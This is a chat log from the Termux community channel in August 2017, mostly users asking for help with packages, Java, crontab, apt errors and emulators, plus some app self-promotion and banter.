2017-08-11 21:25:26 sdrausty #3
2017-08-11 21:25:26 sdrausty Gradle Builds Usually Fail Using buildAPKs.
2017-08-11 21:25:26 sdrausty Opened by sdrausty 5 days ago
2017-08-11 21:25:52 gitter (mklein994) wat
2017-08-11 21:30:52 gitter (sdrausty) @mklein994
2017-08-11 21:31:30 gitter (sdrausty) Build//
2017-08-11 21:32:28 gitter (mklein994) I’m talking about nodejs
. What does building APKs on Android have to do with the price of beans? :confused:
2017-08-11 21:32:39 gitter (sdrausty) Compile Termux in Termux buildAPKs cannot; Hence
2017-08-11 21:32:54 gitter (sdrausty) https://github.com/sdrausty/buildAPKs/issues/3
2017-08-11 21:33:43 gitter (mklein994) Still not following. Please explain. What’s buildAPKs
?
2017-08-11 21:33:46 gitter (sdrausty) Well, great! I am glad to hear your talking about…
2017-08-11 21:34:04 gitter (sdrausty) I am talking about
2017-08-11 21:34:29 gitter (mklein994) This is starting to sound like one half of a phone conversation.
2017-08-11 21:34:44 gitter (sdrausty) https://sdrausty.github.io/buildAPKs/reallyEasilyBuildAndroidAPKsOnDevice
2017-08-11 21:35:23 gitter (sdrausty) Which should build Termux on device (a smartphone), but doesn’t.
2017-08-11 21:36:06 gitter (sdrausty) @mklein994 How is node.js going for you on Termux?
2017-08-11 21:54:33 gitter (sdrausty) Nice links; Thank you rod*
2017-08-11 21:56:51 sdrausty $ apt list | grep node |
2017-08-11 21:56:51 sdrausty WARNING: apt does not have a stable CLI interface. Use with caution in scripts.
2017-08-11 21:56:51 sdrausty nodejs/stable,now 6.11.2 aarch64 [installed]
2017-08-11 21:56:51 sdrausty nodejs-current/stable 8.2.1 aarch64
2017-08-11 21:56:51 sdrausty nodejs-current-dev/stable 8.2.1 aarch64
2017-08-11 21:56:51 sdrausty nodejs-dev/stable,now 6.11.2 aarch64 [installed]
2017-08-11 21:58:01 sdrausty @mklein994 What do you want to do with nodejs?
2017-08-11 22:35:19 sdrausty 684 packages that are available https://sdrausty.github.io/pages/more
2017-08-11 23:19:18 aleph- So, for the mods out there. Any chance of a port of docker?
2017-08-11 23:19:24 aleph- s/mods/devs
2017-08-11 23:23:00 live_the_dream not likely
2017-08-11 23:23:46 live_the_dream requires kernel features
2017-08-11 23:38:34 aleph- Ahhh
2017-08-11 23:38:38 aleph- Damn. Oh well.
2017-08-12 04:48:27 gitter (themastersunil) $ startfedora
2017-08-12 04:48:27 gitter (themastersunil) [termux@fedora home]$ dnf update
2017-08-12 04:48:27 gitter (themastersunil) ^C
2017-08-12 04:48:27 gitter (themastersunil) [full message: https://gitter.im/termux/termux?at=598ec0da2723db8d5e987a6f]
2017-08-12 04:49:04 gitter (themastersunil) After dnf update command..not any response
2017-08-12 04:49:43 gitter (themastersunil) I’ve wait at least 5 minute… No any update………
2017-08-12 04:53:09 gitter (themastersunil) $ cd weeman
2017-08-12 04:53:09 gitter (themastersunil) $ ls
2017-08-12 04:53:09 gitter (themastersunil) LICENSE README.md core weeman.py
2017-08-12 04:53:09 gitter (themastersunil) [full message: https://gitter.im/termux/termux?at=598ec1f41c8697534aae9557]
2017-08-12 04:58:54 gitter (Auxilus) tar: can't create node kali-arm64/dev/random: Operation not permitted
2017-08-12 05:17:01 gitter (Auxilus) cr4shcod3 got kalifs working in termux, so do I..
2017-08-12 05:45:35 poyntz hi all. is there any way to PIN protect termux or do you have to use another app?
2017-08-12 10:32:21 NonaSuomy https://nonasuomy.github.io/android-file-sync/
2017-08-12 10:34:32 NonaSuomy Made a script with termux to sync files with rsync to nas
2017-08-12 10:37:09 NonaSuomy I just have to figure out crontab wonder if there is much battery drain using crond in busy box
2017-08-12 11:03:12 sdrausty NonaSuomy: Cronrab doesn’t drain the battery much by itself. It depends what you tell crontab to do.
2017-08-12 11:25:38 theHaggster Hi. Does anyone know how to fix apt checksum mismatch errors that suddenly come up? I’ve tried apt clean, I’ve tried deleting the contents of /var/lib/apt/lists, I’ve even tried to add a 99conf file in /etc/apt/apt.conf that would override any checksum checks, but I keep getting the error.
2017-08-12 11:26:02 theHaggster apt.conf=apt.conf.d
2017-08-12 11:27:38 theHaggster this is the error that keeps coming up for any apt or pkg command: “Failed to fetch http://termux.net/dists/stable/main/binary-arm/Packages.xz Hash Sum mismatch”
2017-08-12 11:30:36 gitter (Ashish882) Hi
2017-08-12 11:31:26 gitter (Ashish882) I want to MV one file to /system/bin without root in termux any trick
2017-08-12 11:31:42 gitter (Ashish882) @vishalbiswas
2017-08-12 13:21:15 NonaSuomy Anyone know about that above, client died
2017-08-12 13:42:16 NonaSuomy sdrausty: thanks
2017-08-12 13:45:01 NonaSuomy sdrausty: can you use crontab in termux without busy box?
2017-08-12 13:51:46 sdrausty NonaSuamy: $ which crontab
2017-08-12 13:52:11 sdrausty NonaSuamy: /data/data/com.termux/files/usr/bin/applets/crontab
2017-08-12 13:52:43 sdrausty NonaSuamy: $ ls -al /data/data/com.termux/files/usr/bin/applets/crontab
2017-08-12 13:53:10 sdrausty NonaSuamy: lrwxrwxrwx 1 u0_a93 u0_a93 10 Aug 11 09:42 /data/data/com.termux/files/usr/bin/applets/crontab -> ../busybox
2017-08-12 13:57:16 sdrausty NonaSuamy: crontab is busybox
2017-08-12 14:39:22 gitter (NonaSuomy) @sdrausty I was reading this comment “the issue with crond is that it could be terminated in the background unless a wake lock is held. However, always holding a wake lock means that the CPU is always awake, even if there’s nothing to do. “
2017-08-12 14:55:29 bobloblaw_ I’m not sure if this is the right place to ask, but I’m having trouble getting a rails server to run in Termux
2017-08-12 14:59:52 gitter (sdrausty) @NonaSuomy try termux
2017-08-12 15:00:59 gitter (sdrausty) $ termux-wake-lock and see if you like it. I use it to keep crond awake on a smartphone.
2017-08-12 15:45:13 gitter (vishalbiswas) @Ashish882 not possible
2017-08-12 15:56:30 gitter (NonaSuomy) @sdrausty is there anything that lets the phone sleep until an event then go back to sleep
2017-08-12 16:02:50 gitter (NonaSuomy) After the event
2017-08-12 16:06:00 gitter (NonaSuomy) Like I want to run my backup script at 12am everyday
2017-08-12 16:59:53 gitter (AshleyNykiel) Error installing pylibmc (python3), already have memcached and memcached-dev installed, any workarounds?
2017-08-12 16:59:53 gitter (AshleyNykiel)
2017-08-12 16:59:53 gitter (AshleyNykiel) In file included from src/_pylibmcmodule.c:34:
2017-08-12 16:59:53 gitter (AshleyNykiel) [full message: https://gitter.im/termux/termux?at=598f6c48162adb6d2eed0c5f]
2017-08-12 21:12:53 sdrausty pull requests welcome https://github.com/sdrausty/buildAPKs/pulls
2017-08-12 21:16:55 sdrausty Gitter / IRC bot is down again. Please fix it. It is important for us.
2017-08-12 21:21:12 rods-tab3 gitter showed be banned; he posts way too much
2017-08-12 21:24:25 live_the_dream i think he has multiple personality disorder as well
2017-08-12 21:26:26 rods-tab3 me too; as well as senelity and dementia – what did you just say ?
2017-08-12 21:29:52 fornwall the gitter/irc bot will be up in a couple of hours (it got banned from freenode temporarily)
2017-08-13 00:31:10 lunaMoon What do I do first?
2017-08-13 00:31:33 lunaMoon I just got the app, and need to know what to do first
2017-08-13 00:34:16 rods-tab3 type: apt install man
2017-08-13 00:38:18 rods-tab3 then read ALL of: https://termux.com/help.html
2017-08-13 00:39:15 rods-tab3 then join the #termux IRC channel on freenode.net
2017-08-13 02:22:48 frumpylava live_the_dream: Yeah, what should I check?
2017-08-13 02:24:20 live_the_dream compiling a python module thst has c etc..
2017-08-13 02:24:21 live_the_dream it fails on my device unless im using tmux
2017-08-13 02:25:22 live_the_dream or login via ssh
2017-08-13 02:26:02 frumpylava live_the_dream: that sounds so weird.
2017-08-13 02:26:23 frumpylava live_the_dream: but sure. can you give me a test case?
2017-08-13 02:35:20 imaami maybe something about the environment variables?
2017-08-13 02:35:50 imaami it could be that a different set of bashrc or profile scripts are sourced depending on login method
2017-08-13 02:48:45 live_the_dream pip install numpy should fail
2017-08-13 02:48:45 live_the_dream like at first check
2017-08-13 02:48:59 live_the_dream it could be several things
2017-08-13 03:01:28 imaami live_the_dream: maybe the configure script uses a shell variable (like $SHELL maybe) to find out the shell command, and if the variable is unset it defaults to /bin/bash
2017-08-13 03:02:02 imaami live_the_dream: i had that happen to me recently. termux-fix-shebang can’t fix that sort of thing because it only changes the #!/… line
2017-08-13 03:08:19 live_the_dream no
2017-08-13 03:09:06 live_the_dream i tested env variables already
2017-08-13 03:26:05 frumpylava live_the_dream: you’re right. it works in tmux, but not without. e
2017-08-13 04:00:56 live_the_dream thanks
2017-08-13 04:02:58 live_the_dream fornwall: python aarch64 at least fails compiling numpy but works using tmux … possibly ncurses related?
2017-08-13 04:07:02 gitter (suryapoo) Guys..anyone with arm assembly
2017-08-13 04:07:14 gitter (suryapoo) Experience?
2017-08-13 04:57:33 imaami live_the_dream: weird
2017-08-13 05:51:00 fornwall live_the_dream: it’s different if you compile under tmux or not? is this on-device or when cross compiling using termux-packages?
2017-08-13 06:03:58 live_the_dream on devic3
2017-08-13 06:05:00 live_the_dream its why i asked frumpylava to check
2017-08-13 06:24:38 lazymonster Hi everyone
2017-08-13 06:24:48 lazymonster I am new to termux.
2017-08-13 06:24:58 lazymonster I can’t run mklink
2017-08-13 06:25:19 live_the_dream hello
2017-08-13 06:25:30 lazymonster Can anyone help me out.?
2017-08-13 06:25:32 lazymonster Hi
2017-08-13 06:25:39 sdrausty ln -s
2017-08-13 06:25:46 sdrausty hello
2017-08-13 06:26:22 lazymonster Wow.. Thanx sdrausty
2017-08-13 06:26:26 sdrausty man ln
2017-08-13 06:26:43 sdrausty your welcome
2017-08-13 06:27:36 lazymonster Should have come here earlier :/
2017-08-13 06:29:30 sdrausty glad your here lazymonster:
2017-08-13 06:42:44 lazymonster Has anyone tried to run swift in termux?
2017-08-13 07:02:23 gitter (suryapoo) Anyone has been able to run java on termux?
2017-08-13 07:21:37 sdrausty @surapoo https://github.com/termux/termux-packages/issues?utf8=✓&q=java
2017-08-13 07:32:39 gitter (suryapoo) @sdrausty ..thanks
2017-08-13 07:32:40 gitter (suryapoo) Man
2017-08-13 08:01:51 sdrausty @surapoo Your Welcome 😉
2017-08-13 08:56:19 u0_a157 +quit
2017-08-13 08:58:36 gitter (Ashish882) Anybudy clear tell how to install java in termux without root
2017-08-13 09:08:15 lazymonster I tried to run java in termux.
2017-08-13 09:08:45 lazymonster I installed ecj (apt install ecj).
2017-08-13 09:09:39 lazymonster And I successfully generated class file. (ecj file.java)
2017-08-13 09:12:09 lazymonster I am not sure about next steps. :/
2017-08-13 09:20:47 sdrausty lazymoster: Give https://sdrausty.github.io/buildAPKs/reallyEasilyBuildAndroidAPKsOnDevice and let us know your opinion.
2017-08-13 09:20:58 lazymonster Okay I installed dx and converted class to jar
2017-08-13 09:21:13 lazymonster Now how do I execute this?
2017-08-13 09:23:00 lazymonster Wow. Just saw the link.
2017-08-13 09:23:03 lazymonster Its great.
2017-08-13 09:23:11 sdrausty lol
2017-08-13 09:24:14 lazymonster Can you tell me how to execute java code?
2017-08-13 09:24:40 lazymonster In cli. There isn’t much.
2017-08-13 09:27:57 sdrausty https://github.com/termux/termux-packages/issues?utf8=✓&q=run%20jar%20java
2017-08-13 09:36:54 lazymonster I didn’t get it.
2017-08-13 09:38:11 lazymonster That page is only showing issues
2017-08-13 09:43:05 gitter (sdrausty) There are still problems with java, it seems.
2017-08-13 09:53:26 gitter (NonaSuomy) Is there anything in termux that would allow the mobile device to sleep and then wakeup at a specific time, run a script then go back to sleep?
2017-08-13 11:19:57 gitter (suryapoo) Guys…i want to learn reverse engineering..can i do
2017-08-13 11:20:19 gitter (suryapoo) it in termux with the help of pacakages : as,
2017-08-13 11:21:10 gitter (suryapoo) really excited
2017-08-13 11:30:59 gitter (Ashish882) @sdrausty yes….
2017-08-13 11:39:06 gitter (Ashish882) I want to run it to decomile the apk can I do with your script
2017-08-13 11:39:15 gitter (Ashish882) Or infect the apk
2017-08-13 11:54:33 gitter (sdrausty) @Ashish882 Simply building APKs.
2017-08-13 12:46:41 gitter (Ashish882) Tell how I can infecte the apk
2017-08-13 15:14:34 Pagankiki Hello i have a question?
2017-08-13 15:16:42 Pagankiki In anyone even here?
2017-08-13 15:58:00 Pagankiki I need help
2017-08-13 15:58:06 Pagankiki what do i do first
2017-08-13 16:04:12 sdrausty ?
2017-08-13 16:06:34 Pagankiki So, i just got the app, trying to get apps for it, more specifically, How do i add other repositireoes?
2017-08-13 16:10:56 sdrausty https://termux.com/package-management.html
2017-08-13 16:12:44 sdrausty https://sdrausty.github.io/pages/more
2017-08-13 16:12:50 Pagankiki Ill check it out, also, why can i get the app to run in a emulator?
2017-08-13 16:13:18 Pagankiki when i use it, it says to use PKG instead of APT
2017-08-13 16:13:55 Pagankiki I have to go,
2017-08-13 16:14:00 sdrausty pkg or apt not much diff
2017-08-13 16:14:33 Pagankiki okay
2017-08-13 16:16:08 sdrausty discussion about pkg and apt https://plus.google.com/+AyushSingh1325/posts/4YAddNZndDx
2017-08-13 16:17:24 sdrausty pkg
is a wrapper for apt
just like packages
is. It should not make much difference which one you choose to use. dpkg
is a little different, and it is also used for package management.
2017-08-13 19:15:14 u0_a488 whois
2017-08-13 19:26:36 Pagankiki Hello, is it possible to put a GUI on the app?
2017-08-13 20:22:36 sdrausty Pagankiki: What kind of GUI do you have in mind?
2017-08-13 20:36:43 rods-tab3 windows 7
2017-08-13 20:36:58 rods-tab3 64 bit
2017-08-13 22:01:09 sdrausty windows 95 not 98
2017-08-13 22:35:13 luna__ Its me, pagan using a diff PC, i was thinking a easy package manager,
2017-08-13 22:35:55 luna__ Like soemthing like the Ubuntu UNITY Gnome desktop
2017-08-13 22:45:04 rods-tab3 windows 3.11 wfwg – better yet, Can we run android under termux ?
2017-08-13 22:45:12 luna__ wut?
2017-08-13 22:49:49 luna__ i just want, a touchscreen complient UI to make managing my installs easiar
2017-08-13 23:05:23 rods-tab3 do you have termux widgets ? it allows a widget window to select tasks
2017-08-13 23:05:52 gitter (sdrausty) Look people, we have a GUI. It’s Android. Can you control Android without CLI?
2017-08-13 23:06:47 luna__ no i dont, can i have a link to that?
2017-08-13 23:06:55 luna__ or directions?
2017-08-13 23:07:11 gitter (sdrausty) Why would anyone want to make a GUI in a GUI?
2017-08-13 23:07:14 rods-tab3 ohhhold on
2017-08-13 23:07:28 luna__ and gitter? i was talking about FOR Termux, to make it easyer to use
2017-08-13 23:07:42 luna__ and i would want to use the terminal
2017-08-13 23:08:51 gitter (sdrausty) Learn CLI (COMMAND LINE INTERFACE). Forget the GUI…
2017-08-13 23:09:06 gitter (sdrausty) Well you can’t. It’s Android.
2017-08-13 23:09:36 rods-tab3 https://termux.com/add-on-widget.html
2017-08-13 23:10:04 luna__ Is there a way i could install a UBUNTUapp into ti? i mean by downloading it?
2017-08-13 23:10:20 rods-tab3 its free - get that and termux api and termux styling from app store
2017-08-13 23:10:39 luna__ Like if i download the DEB file, can i install it?
2017-08-13 23:11:18 sdrausty Try some of the scripts at https://github.com/sdrausty/buildAPKs/tree/master/scripts/build
2017-08-13 23:11:58 rods-tab3 which app ? termux has 669++ available
2017-08-13 23:12:13 sdrausty GUI’s galore in any APK on Termux.
2017-08-13 23:12:35 luna__ I mean like a package manager?
2017-08-13 23:12:57 sdrausty 685 packages that are available from https://sdrausty.github.io/pages/more
2017-08-13 23:14:58 sdrausty https://www.google.com/search?q=command+line+interface
2017-08-13 23:16:28 luna__ well..
2017-08-13 23:17:26 sdrausty https://www.google.com/search?q=command+line+interface+site%3Atldp.org
2017-08-13 23:18:47 sdrausty Much better search results at https://duckduckgo.com/?q=command+line+interface+site%3Atldp.org&t=ha&ia=web
2017-08-13 23:19:13 luna__ i dont use duckduckgo search engine, i find it crap
2017-08-13 23:19:20 sdrausty http://tldp.org/REF/VLC-User-Guide/cmdline.html Introduction…
2017-08-13 23:19:55 luna__ is there a way i can even build a GUI using Termux, for Termux?
2017-08-13 23:20:09 sdrausty sorry you don’t like alernstives luna_:
2017-08-13 23:20:36 luna__ i am willing to learn, just want to beable to build a GUI
2017-08-13 23:20:46 luna__ a basic one i dont mind
2017-08-13 23:20:58 sdrausty https://sdrausty.github.io/buildAPKs/reallyEasilyBuildAndroidAPKsOnDevice more than one, over 400 at last count
2017-08-13 23:20:58 luna__ if i make it clunky at first, i can improve
2017-08-13 23:23:12 luna__ Oh, any good keyboards to use with Termux,
2017-08-13 23:23:16 luna__ ?
2017-08-13 23:23:39 luna__ i hat ehaving to use HackerKeyboard and swap between my TouchPal and it
2017-08-13 23:24:42 sdrausty use Gboard it great with https://termux.com/touch-keyboard.html
2017-08-13 23:25:56 luna__ does it provide feedback as an option when i type?
2017-08-13 23:29:50 luna__ as in does it give a tiny vibration when you tap abutton
2017-08-13 23:29:57 rods-tab3 I was expecting that using termux-dialog and termux-toast from API package together with widget would allow me to create useful actions and tiny apps without terminal running in foreground, however ………. Note that background tasks is now supported: Just create your shortcuts inside ~/.shortcuts/tasks. https://play.google.com/store/apps/details?id=com.termux.widget
2017-08-13 23:36:39 luna__ oh, cansomeone tell me why icant get termux to run on an android emulator?
2017-08-13 23:38:17 live_the_dream ?
2017-08-13 23:39:32 luna__ i have an Android emulator, but when i try to install Termux, it says its not compatable, and when i try to install the APK it says “Trouble Parsing the package”
2017-08-13 23:44:38 live_the_dream what android version?
2017-08-13 23:46:56 luna__ let me check the emulator
2017-08-13 23:47:23 luna__ 4.4.4
2017-08-13 23:48:27 luna__ probably the reason?
2017-08-13 23:53:33 live_the_dream yep
2017-08-13 23:53:41 live_the_dream termux needs 5.0+
2017-08-13 23:53:55 luna__ working on getting it downloaded
2017-08-13 23:54:24 luna__ downloading 5.1 now with the emulator
2017-08-14 00:27:53 luna__ is there a way i can create a Runtime enviroment like Termux on Ubuntu? so i can learn on a PC?
2017-08-14 02:03:43 gitter (aranwa3) hay amyone please help my termux sources.txt is deleted
2017-08-14 04:32:57 gitter (fornwall) @aranwa3 did you loose the $PREFIX/etc/apt/sources.list
file?
2017-08-14 04:33:22 gitter (fornwall) @aranwa3 if so, you can add back the main repo withecho "deb http://termux.net stable main" > $PREFIX/etc/apt/sources.list
2017-08-14 07:12:45 gitter (Ashish882) Help me to infect any apk
2017-08-14 12:09:18 gitter (Ashish882) SQL for termux
2017-08-14 12:10:53 bunterxx https://play.google.com/store/apps/details?id=com.letigre.iconic
2017-08-14 12:10:56 bunterxx enjoy
2017-08-14 12:11:05 bunterxx this I did on termux
2017-08-14 12:11:18 bunterxx writing plus testing
2017-08-14 12:11:52 bunterxx would be happy if you could leave ma 5star rating and a good review!:)
2017-08-14 12:13:43 gitter (Auxilus) Nice!
2017-08-14 12:14:06 gitter (Auxilus) How you did testing btw?
2017-08-14 12:44:34 gitter (Ashish882) OK
2017-08-14 13:00:42 sdrausty bunterxx: Where is the source for your drumpad?
2017-08-14 13:34:05 gitter (suryapoo) Is Go language available for termux?
2017-08-14 14:04:30 gitter (vishalbiswas) apt install golang
2017-08-14 14:08:32 gitter (suryapoo) Gr888!!!!
2017-08-14 14:09:10 gitter (suryapoo) Is it stable…like C and other languages that termux supports?
2017-08-14 14:17:10 frumpylava @suryapoo: yes.
2017-08-14 14:17:56 gitter (suryapoo) Gr88888!!! Thanks peeps!
2017-08-14 16:29:15 sdrausty How can you find out what is available at https://dl.google.com/android/repository/
2017-08-14 16:30:19 sdrausty When I use Chrome it states, “404. That’s an error.
2017-08-14 16:30:19 sdrausty That’s all we know.
2017-08-14 16:31:26 sdrausty https://dl.google.com/android/repository/tools_r25.2.3-linux.zip fetches *linux.zip in Chome as it should.
2017-08-14 16:31:48 sdrausty What else is in https://dl.google.com/android/repository/ Anyone?
2017-08-14 17:03:06 rods-tab3 404 then just dl.google.com goes to chrome
2017-08-14 17:17:09 sdrausty rods-tab3: When I use ftp I can get a directory listing. How can I get a directory listing for https://dl.google.com/android/ ?
2017-08-14 17:20:58 sdrausty ftp://ftp.gnu.org has a beautiful listing of its’ contents, not 404!
2017-08-14 17:32:58 rods-tab3 ftp uses a different port number than https
2017-08-14 17:34:04 gitter (sdrausty) That is correct 23 ftp 80 http
2017-08-14 17:34:43 gitter (sdrausty) Where is the listing (table of contents) for
2017-08-14 17:34:56 gitter (sdrausty) https://dl.google.com/android/ ?
2017-08-15 00:27:26 live_the_dream hmm adding shebang for debscripts in ./build-package.sh or make the build.sh do it?
2017-08-15 00:41:04 live_the_dream make build.sh do it
2017-08-15 02:22:24 frumpylava fornwall: Why hasn’t termux-styling been updated on f-droid?
2017-08-15 04:33:49 Patruska[m] frumpylava: the same old problem with for droid
2017-08-15 04:37:16 frumpylava Patruska[m]: hmm.. yeah… found the build log. Can’t this be fixed?
2017-08-15 04:43:32 Patruska[m] frumpylava: you should write to the developer, but i think there are worse cases, lo l give a look at “ring” build log on Friday droid and compare the latest flash droid version and the play store one . Maybe you can complain about
2017-08-15 04:44:04 Patruska[m] frumpylava: you should write to the developer, but i think there are worse cases, lo l give a look at “ring” build log on Friday droid and compare the latest flash droid version and the play store one . Maybe you can complain about termux
2017-08-15 05:42:08 gitter (Ashish882) Hi
2017-08-15 05:42:23 gitter (Ashish882) How to install SQL in termux
2017-08-15 07:44:02 gitter (suryapoo) @Hackz…apt install mariadb
2017-08-15 07:44:14 gitter (suryapoo) Termux has mariab not mysql
2017-08-15 07:44:25 gitter (suryapoo) I checked ur blog dude
2017-08-15 07:44:34 gitter (suryapoo) its “badiya”
2017-08-15 07:44:47 gitter (suryapoo) Guys…clojure support for termux?
2017-08-15 07:45:03 gitter (suryapoo) Since we dont have java..we dont have clojure ??
2017-08-15 08:36:49 sdrausty When I use ftp I can get a directory listing. How can I get a directory listing for https://dl.google.com/android/ ?
2017-08-15 09:03:57 gitter (Ashish882) OK thanks @suryapoo
2017-08-15 09:04:14 gitter (Ashish882) But who’s blo
2017-08-15 09:04:23 gitter (Ashish882) But who’s blog
2017-08-15 09:05:25 ulno[m] Anybody using ranger as file manager in termux - mouse and touch doesn’t work on it (and is very slow via ssh) - ncurses/slang problem - mouse/touch works very well on mc?
2017-08-15 09:10:33 gitter (suryapoo) @Ashish882 ..u have a blog na
2017-08-15 09:11:02 gitter (Ashish882) Which
2017-08-15 09:22:48 gitter (suryapoo) There was a site ..in which the post about build apks on android with termux with the username Ashish882..so i thought its urs
2017-08-15 09:22:50 gitter (suryapoo) :)
2017-08-15 09:23:42 frumpylava @suryapoo don’t you mean this: https://sdrausty.github.io/buildAPKs/
2017-08-15 09:33:19 sdrausty When I use ftp I can get a directory listing. How can I get a directory listing for https://dl.google.com/android/ ?
2017-08-15 09:34:21 frumpylava sdrausty: You can’t.
2017-08-15 09:36:26 sdrausty flumpylava: You can’t?
2017-08-15 09:37:35 sdrausty That’s not what I was taught at computer classes. Why can’t you download a listing for https://dl.google.com/android/ ?
2017-08-15 09:38:17 frumpylava sdrausty: Because it most likely isn’t a real directory on some server.
2017-08-15 09:39:08 frumpylava sdrausty: Unless a webserver is very specifically configured to list the directory, it won’t.
2017-08-15 09:39:10 sdrausty There zhould be a file somewhere like http://termux.net/dists/stable/main/binary-all/Packages.xz
2017-08-15 09:40:32 sdrausty list (table of contents) for android repository at google it is open source after all
2017-08-15 09:44:50 sdrausty http://ftp.nz.debian.org/debian/ls-lR.gz where is something like this at https://dl.google.com/android/
2017-08-15 09:48:22 frumpylava sdrausty: I don’t know about that. There could be a file like that (altough I doubt it). All I know is that it’s not possible to list a directory over http the same way it is with ftp.
2017-08-15 09:48:38 frumpylava what are you even looking for?
2017-08-15 09:50:02 sdrausty the file list for https://dl.google.com/android/
2017-08-15 09:50:15 sdrausty the listing for https://dl.google.com/android/
2017-08-15 09:50:52 frumpylava sdrausty: yeah, but why?
2017-08-15 09:51:48 sdrausty frumpylava: termux-app builds on device, but it doesn’t build right
2017-08-15 09:52:38 sdrausty i want the listing of SDKs NDKs and whatever else can be downloaded from https://dl.google.com/android/
2017-08-15 09:54:46 sdrausty Finding and installing dependantcies is a stumbling block in developing gradle builds https://github.com/sdrausty/buildAPKs/issues/3
2017-08-15 09:56:15 sdrausty Where is the list of files (*.jar && *.arr) to build Android APKs?
2017-08-15 09:57:11 sdrausty at https://dl.google.com/android/ this is open source therefore it must be there somewhere. Where is it?
2017-08-15 09:58:31 frumpylava sdrausty: Just because it’s open source doesn’t mean it can’t be confusing and obtuse.
2017-08-15 10:00:34 sdrausty lol
2017-08-15 10:02:20 sdrausty That is why I am asking
2017-08-15 10:04:27 sdrausty flumpylava: Are you using weechat in Termux?
2017-08-15 10:05:53 sdrausty Anyone using weechat in Termux here?
2017-08-15 10:07:20 sdrausty The reason I am asking is, “What do you think about the Flickering now that the garbage is gone?”
2017-08-15 10:07:44 sdrausty Garbage isn’t gone; Argg.
2017-08-15 10:08:04 frumpylava sdrausty: No. My weechat in termux doesn’t work, as it crashes my device. I’m using weechat on a remote server, where I can’t see any flickering.
2017-08-15 10:08:17 sdrausty tnx
2017-08-15 12:43:47 schotter hi, i wanted to create some thumbnails with convert (imagemagick) but it segfaults :/ Can anyone verify this?
2017-08-15 12:44:41 gitter (Ashish882) Hi
2017-08-15 14:08:49 gitter (cocodevienne) Uh can someone help me here?
2017-08-15 14:09:32 schotter perhaps
2017-08-15 14:14:23 gitter (cocodevienne) Ok so Python is a powerful tool and all I am saying is that Termux got me to where I am today. And because I finally figured out how to do it, I built an Android app using Python. Now I know Termux has a lot of downloads and I would really love to have the same on my app. Now I’ve helped everyone her in the community who asked as best I could. All I am asking is whether somebody could help me maybe promote the app or tell me w
2017-08-15 14:14:23 gitter downloads and maybe download my app and leave a good review for it and maybe give it 5 stars? I know I shouldn’t be doing this but I am getting abit sadbecause I put in so much effort and nobody seems to care!:(
2017-08-15 14:15:04 gitter (cocodevienne) I really hope you all enjoy it!
2017-08-15 14:15:07 gitter (cocodevienne) https://play.google.com/store/apps/details?id=com.letigre.iconic
2017-08-15 14:15:21 gitter (cocodevienne) If yo have any questions just ask.
2017-08-15 14:15:44 gitter (cocodevienne) Again sorry for the crosspromo but i do not know where else to go.
2017-08-15 14:15:58 gitter (cocodevienne) How did you get so many downloads?
2017-08-15 14:16:02 gitter (cocodevienne) @fornwall
2017-08-15 14:27:04 sdrausty @cocodevienne Where is the source for you app?
2017-08-15 14:42:27 rods-tab3 whats a drum pad ?
2017-08-15 16:35:07 Church- Any chance of getting salt-stack running? The master node that is.
2017-08-15 16:58:26 gitter (cocodevienne) its free but closed source
2017-08-15 16:58:32 gitter (cocodevienne) @sdrausty
2017-08-15 17:00:09 gitter (cocodevienne) Its like one of those pads with buttons where you can make a beat when you press a bunch of buttons in a certain combination
2017-08-15 17:00:18 gitter (cocodevienne) @rods-tab3
2017-08-15 17:42:00 sdrausty @covodevinne I’m curious; Why did you choose the closed source model?
2017-08-15 17:44:33 gitter (cocodevienne) Because I am planning to make apps and sell them!:) I thought I’d see how it would go and then only put out something paid. Wow this is really getting me down!:( Do you have any advice for me? I’ll help you gladly making APKs with Python if you want!!:) @sdrausty
2017-08-15 17:51:44 rods-tab3 ‘‘the road to profits is fraught with major disappointments’’
2017-08-15 17:54:17 gitter (cocodevienne) I know what you mean but I dunno I’m kind used to stuff not getting a ton of downloads that I put a lot if work into. @rods-tab3 That’s why this undertone of disappoinment.
2017-08-15 17:55:42 gitter (cocodevienne) I am really grateful to anyone who downloads it and gives me 5 stars!! If you really have any questions, I’ll answer it even if it may seem silly to you but hey we all know that there is no such thing as a stupid question!;) Keep in mind that I am also kinda new to this whole business.
2017-08-15 17:58:50 gitter (sdrausty) https://www.google.com/search?q=donation+for+mark+harman open source model 10000x$2
2017-08-15 17:59:04 gitter (sdrausty) @present
2017-08-15 17:59:53 gitter (sdrausty) Not to mention Termux add-ons @$2 too.
2017-08-15 18:01:20 gitter (sdrausty) *10000 5000
2017-08-15 18:05:45 gitter (cocodevienne) Yeah but same thing nobody would buy my “Donation App” if you will just because I make the source of my apps publicly available, or?
2017-08-15 18:05:57 gitter (cocodevienne) I mean I might be completely wrong of course…
2017-08-15 18:06:19 gitter (cocodevienne) Like how will people know about it?🤔
2017-08-15 18:06:26 gitter (cocodevienne) That is to say the donation app?
2017-08-15 18:06:31 gitter (cocodevienne) @sdrausty
2017-08-15 18:06:47 gitter (cocodevienne) Still, thanks for the impulse, I shall give it some thought!
2017-08-15 18:07:10 gitter (cocodevienne) Honestly, this is what I like about his community, everybody is being so nice.
2017-08-15 18:07:24 gitter (sdrausty) Bennett github.com - open-keychain/open-keychain is a very interesting app, 30% to donate through Google! Wow.
2017-08-15 18:07:57 gitter (sdrausty) https://github.com/open-keychain
2017-08-15 18:08:02 gitter (cocodevienne) Ah yes btw, I am considering restarting my DEB repo soon. I want to streamline everything I make as much as possible!
2017-08-15 18:08:10 rods-tab3 iirc goolag takes 30% of every purchase re app store
2017-08-15 18:08:30 gitter (cocodevienne) @vishalbiswas @Auxilus @fornwall
2017-08-15 18:08:41 gitter (sdrausty) https://github.com/open-keychain
2017-08-15 18:08:55 gitter (cocodevienne) Will be posting exact sources.list
code once its ready.
2017-08-15 18:09:09 gitter (cocodevienne) Is that the src? @sdrausty
2017-08-15 18:09:39 gitter (cocodevienne) I’m not to sure I knkw what you mean @sdrausty @rods-tab3
2017-08-15 18:09:44 gitter (cocodevienne) *know
2017-08-15 18:10:37 rods-tab3 google==goolag since they no longer tolerate free speech
2017-08-15 18:10:49 sdrausty rods-tab3: This might not be the case in Open Camera since there is a purchased app from the Playstore (that should not be uninstalled within 15 min)
2017-08-15 18:11:58 gitter (cocodevienne) What?!
2017-08-15 18:12:04 gitter (cocodevienne) 30%?!!
2017-08-15 18:12:12 sdrausty nor provide directory listings
2017-08-15 18:12:23 rods-tab3 i think i read that here
2017-08-15 18:12:41 sdrausty be glad it’a not 60% @cocodevienne
